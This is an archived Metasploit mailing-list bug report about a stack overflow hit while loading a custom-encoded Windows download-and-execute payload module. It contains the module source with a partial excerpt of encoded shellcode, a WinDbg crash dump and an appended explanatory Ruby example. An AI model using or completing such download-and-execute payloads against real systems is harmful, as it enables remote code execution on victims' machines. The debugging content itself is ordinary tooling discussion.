Metasploit mailing list archives
Trying to create my own payload resulted in stack overflow
From: herzel levy <herzelevy () gmail com>
Date: Thu, 2 Dec 2010 21:55:18 +0200
Hi,

I'm not experienced with developing for the framework or reporting bugs, and I hope I'm doing it the right way.

I was trying to create an encoded version of the Download_Exec.rb payload using the shikata ga nai and the alpha upper encoders, which resulted in a very big payload. I put my payload at 'msf3\modules\payloads\singles\windows' and started Metasploit. Metasploit then crashed with a stack overflow error. I attached the crash dump and the payload I created.

Metasploit version: 3.5.1-dev.11003
Environment: Win7 x86

*The payload looks something like this:*

require 'msf/core'
require 'msf/core/payload/windows/exec'

module Metasploit3

  include Msf::Payload::Windows
  include Msf::Payload::Single

  def initialize(info = {})
    super(update_info(info,
      'Name'          => 'Windows Executable Download and Execute',
      'Version'       => '$Revision: 9488 $',
      'Description'   => 'Download an EXE from an HTTP URL and execute it',
      'Author'        =>
        [
          'lion[at]cnhonker.com',
          'pita[at]mail.com'
        ],
      'License'       => BSD_LICENSE,
      'Platform'      => 'win',
      'Arch'          => ARCH_X86,
      'Privileged'    => false,
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' =>
            "\xb8\xf3\x11\x7c\xdb\x29\xc9\x66\xb9\x30\x3c\xdb\xd4\xd9" +
            "\x74\x24\xf4\x5f\x31\x47\x11\x03\x47\x11\x83\xef\xfc\xe2" +
            "\x06\x20\xb5\x65\x99\xa8\x39\x7d\x3f\x96\xeb\xbd\x66\x2a" +
            "\x32\xc9\xbc\x5f\x9a\x03\xcb\x8f\x26\x13\x23\x33\xc7\x27" +
            "\xd0\x2d\xbe\xfe\x3d\x9a\x2c\xd3\xa5\xc8\x38\x26\xab\x48" +
            "\x00\xad\xbb\x53\xea\xf5\x5e\x10\xd0\xae\xe3\x39\xa2\xfa" +
            ........................................ (1670 lines more like these...)
        }
    ))

    # EXITFUNC is not supported :/
    deregister_options('EXITFUNC')

    # Register command execution options
    register_options(
      [
        OptString.new('URL', [ true, "The pre-encoded URL to the executable" ])
      ], self.class)
  end

  #
  # Constructs the payload
  #
  def generate_stage
    return module_info['Payload']['Payload']
  end

end

*WinDbg crash dump:*

Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*C:\windbgsymbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00400000 0046c000   C:\framework\ruby\bin\ruby.exe
ModLoad: 77920000 77a5c000   C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 76930000 76a04000   C:\Windows\system32\kernel32.dll
ModLoad: 75b40000 75b8a000   C:\Windows\system32\KERNELBASE.dll
ModLoad: 62d00000 62f23000   C:\framework\ruby\bin\msvcrt-ruby191.dll
ModLoad: 76400000 764a0000   C:\Windows\system32\ADVAPI32.DLL
ModLoad: 76260000 7630c000   C:\Windows\system32\msvcrt.dll
ModLoad: 77660000 77679000   C:\Windows\SYSTEM32\sechost.dll
ModLoad: 76720000 767c1000   C:\Windows\system32\RPCRT4.dll
ModLoad: 765a0000 765ca000   C:\Windows\system32\IMAGEHLP.DLL
ModLoad: 76a10000 77659000   C:\Windows\system32\SHELL32.DLL
ModLoad: 75f30000 75f87000   C:\Windows\system32\SHLWAPI.dll
ModLoad: 77a70000 77abe000   C:\Windows\system32\GDI32.dll
ModLoad: 764b0000 76579000   C:\Windows\system32\USER32.dll
ModLoad: 77a60000 77a6a000   C:\Windows\system32\LPK.dll
ModLoad: 76360000 763fd000   C:\Windows\system32\USP10.dll
ModLoad: 76220000 76255000   C:\Windows\system32\WS2_32.DLL
ModLoad: 75d70000 75d76000   C:\Windows\system32\NSI.dll
ModLoad: 76580000 7659f000   C:\Windows\system32\IMM32.DLL
ModLoad: 75de0000 75eac000   C:\Windows\system32\MSCTF.dll
ModLoad: 10000000 1003c000   C:\framework\tools\ConsoleHook.dll
ModLoad: 752d0000 752e6000   C:\Windows\system32\CRYPTSP.dll
ModLoad: 750a0000 750db000   C:\Windows\system32\rsaenh.dll
ModLoad: 757b0000 757bc000   C:\Windows\system32\CRYPTBASE.dll
ModLoad: 71280000 71288000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\encdb.so
ModLoad: 6ac40000 6ac47000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\iso_8859_8.so
ModLoad: 6dd40000 6dd48000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\transdb.so
ModLoad: 65480000 65487000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16le.so
ModLoad: 6d400000 6d408000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\utf_16_32.so
ModLoad: 628c0000 628db000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\trans\single_byte.so
ModLoad: 69800000 69807000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\md5.so
ModLoad: 6c640000 6c76b000   C:\framework\ruby\bin\libeay32-0.9.8-msvcrt.dll
ModLoad: 75870000 75877000   C:\Windows\system32\WSOCK32.DLL
ModLoad: 68000000 68009000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest.so
ModLoad: 65080000 6508b000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\stringio.so
ModLoad: 61c80000 61c90000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\iconv.so
ModLoad: 68080000 68174000   C:\framework\ruby\bin\libiconv2.dll
ModLoad: 6a400000 6a423000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\zlib.so
ModLoad: 6c280000 6c29a000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\dl.so
ModLoad: 65000000 65007000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\etc.so
ModLoad: 767d0000 7692c000   C:\Windows\system32\ole32.dll
ModLoad: 74570000 745b0000   C:\Windows\system32\uxtheme.dll
ModLoad: 74740000 748de000   C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7600.16661_none_420fe3fa2b8113bd\comctl32.dll
ModLoad: 77ac0000 77b4f000   C:\Windows\system32\OLEAUT32.dll
ModLoad: 77780000 7791d000   C:\Windows\system32\SETUPAPI.dll
ModLoad: 75af0000 75b17000   C:\Windows\system32\CFGMGR32.dll
ModLoad: 75b20000 75b32000   C:\Windows\system32\DEVOBJ.dll
ModLoad: 76190000 76213000   C:\Windows\system32\CLBCatQ.DLL
ModLoad: 745d0000 746c5000   C:\Windows\system32\propsys.dll
ModLoad: 743b0000 743d1000   C:\Windows\system32\ntmarta.dll
ModLoad: 76310000 76355000   C:\Windows\system32\WLDAP32.dll
ModLoad: 69980000 69987000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\continuation.so
ModLoad: 6e600000 6e624000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\socket.so
ModLoad: 6a1c0000 6a1c7000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\fcntl.so
ModLoad: 671c0000 6720a000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\openssl.so
ModLoad: 6b380000 6b3c0000   C:\framework\ruby\bin\ssleay32-0.9.8-msvcrt.dll
ModLoad: 00770000 0078f000   C:\framework\ruby\bin\ZLIB1.dll
ModLoad: 67300000 67307000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\shift_jis.so
ModLoad: 65600000 6560a000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\strscan.so
ModLoad: 6ce00000 6ce2a000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\syck.so
ModLoad: 75970000 7597b000   C:\Windows\system32\profapi.dll
ModLoad: 652c0000 652c7000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\digest\sha1.so
ModLoad: 64800000 64807000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\euc_jp.so
ModLoad: 75760000 757ab000   C:\Windows\system32\apphelp.dll
ModLoad: 6a640000 6a658000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\bigdecimal.so
ModLoad: 6fac0000 6fac9000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\parser.so
ModLoad: 70f40000 70f47000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_16be.so
ModLoad: 6ffc0000 6ffc7000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32be.so
ModLoad: 6d100000 6d107000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\enc\utf_32le.so
ModLoad: 6adc0000 6adcd000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\json\ext\generator.so
ModLoad: 70380000 704a1000   C:\framework\ruby\lib\ruby\gems\1.9.1\gems\pg-0.9.0-x86-mingw32\lib\1.9\pg_ext.so
ModLoad: 755c0000 755c8000   C:\Windows\system32\SECUR32.dll
ModLoad: 75740000 7575a000   C:\Windows\system32\SSPICLI.DLL
ModLoad: 75290000 752cc000   C:\Windows\system32\mswsock.dll
ModLoad: 74df0000 74df5000   C:\Windows\System32\wshtcpip.dll
ModLoad: 61b80000 61bbb000   C:\framework\ruby\lib\ruby\1.9.1\i386-mingw32\nkf.so
(c54.1180): Stack overflow - code c00000fd (!!! second chance !!!)
eax=067c1298 ebx=0000002b ecx=065ac890 edx=000331a0 esi=00000022 edi=00000000
eip=62e3eafd esp=00032ee0 ebp=00033398 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\framework\ruby\bin\msvcrt-ruby191.dll -
msvcrt_ruby191!rb_iseq_translate_threaded_code+0x383d:
62e3eafd 89bd2cfcffff    mov     dword ptr [ebp-3D4h],edi ss:0023:00032fc4=00000000

Cheers,
Herzel
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
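An added example, not part of the original post and not Metasploit code, that makes the shape of the reported problem visible. The posted module builds its 'Payload' blob from roughly 1,676 string literals chained with `+`, and the dump faults inside msvcrt-ruby191.dll while the module is being loaded, at an address whose nearest exported symbol, rb_iseq_translate_threaded_code, belongs to MRI's bytecode compiler (compile.c). Ruby parses `a + b + c` left-associatively into a nested chain of operator-call nodes, and MRI compiles that tree recursively, so each `"..." +` line costs another level of native stack. The assumption made here is that this recursion is what exhausted the main-thread stack on the reporter's Win7 x86 box (Windows defaults to 1 MB); the dump is consistent with that but does not prove it on its own. The code does not reproduce the crash, which would only take the interpreter down. Instead it generates both the `"..." +` form from the post and an adjacent-literal form that the parser folds into a single string node at parse time, measures the syntax-tree depth of each with `RubyVM::AbstractSyntaxTree` (MRI 2.6 or later), and checks that both evaluate to the same bytes. The sample bytes are constructed, not shellcode.

```ruby
# Added example (not from the original post or the Metasploit project).
# Compares two ways of embedding a large byte blob in Ruby source:
#   1. one literal per line joined with `+`  (the shape in the posted module)
#   2. one literal per line joined with `\`  (adjacent literals, merged by the parser)
# and measures how deep the resulting syntax tree is. The recursive compile of
# a deep `+` chain is the ASSUMED cause of the reported stack overflow.
# SAMPLE_BLOB is constructed test data, not real shellcode.

SAMPLE_BLOB    = (0..255).map { |i| (i * 37 + 11) & 0xff }.pack("C*") * 8 # 2048 bytes
BYTES_PER_LINE = 14 # the posted payload also uses 14 bytes per line

# Number of source lines a blob needs at the given width.
def line_count(blob, per_line = BYTES_PER_LINE)
  (blob.bytesize + per_line - 1) / per_line
end

# One double-quoted Ruby literal with every byte written as a \xNN escape.
def escape_line(byte_values)
  '"' + byte_values.map { |b| format("\\x%02x", b) }.join + '"'
end

# Form 1: each line is a separate literal and a separate `+` call.
# `+` is left-associative, so N lines give an operator chain N-1 deep.
def plus_chain_source(blob, per_line = BYTES_PER_LINE)
  blob.bytes.each_slice(per_line).map { |vals| escape_line(vals) }.join(" +\n")
end

# Form 2: adjacent literals with a backslash line continuation.
# The parser concatenates adjacent string literals into ONE string node,
# so no operator calls are emitted no matter how many lines there are.
def adjacent_literal_source(blob, per_line = BYTES_PER_LINE)
  blob.bytes.each_slice(per_line).map { |vals| escape_line(vals) }.join(" \\\n")
end

# Maximum nesting depth of the syntax tree MRI builds for a source string.
# Non-node children (symbols, nils, literal values) do not add depth.
def ast_depth(source)
  root = RubyVM::AbstractSyntaxTree.parse(source)
  walk = lambda do |node|
    return 0 unless node.is_a?(RubyVM::AbstractSyntaxTree::Node)
    1 + node.children.map { |child| walk.call(child) }.max.to_i
  end
  walk.call(root)
end

# Both forms must evaluate to exactly the original bytes; only the tree shape differs.
def source_roundtrips?(blob)
  eval(plus_chain_source(blob)).b == blob.b &&
    eval(adjacent_literal_source(blob)).b == blob.b
end

if $PROGRAM_NAME == __FILE__
  puts "payload lines        : #{line_count(SAMPLE_BLOB)}"
  puts "`+` chain AST depth  : #{ast_depth(plus_chain_source(SAMPLE_BLOB))}"
  puts "adjacent AST depth   : #{ast_depth(adjacent_literal_source(SAMPLE_BLOB))}"
  puts "same bytes both ways : #{source_roundtrips?(SAMPLE_BLOB)}"
end
```

The `+` form's depth tracks the line count one-for-one, so the post's payload would produce a tree more than ten times deeper than this 147-line sample, while the adjacent-literal form stays at a constant depth of two (a scope node holding a single string node). Either adjacent literals or an array of literals joined at runtime keeps a large embedded blob from turning into a deep operator chain that the compiler has to recurse through.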
Current thread:
- Trying to create my own payload resulted in stack overflow herzel levy (Dec 02)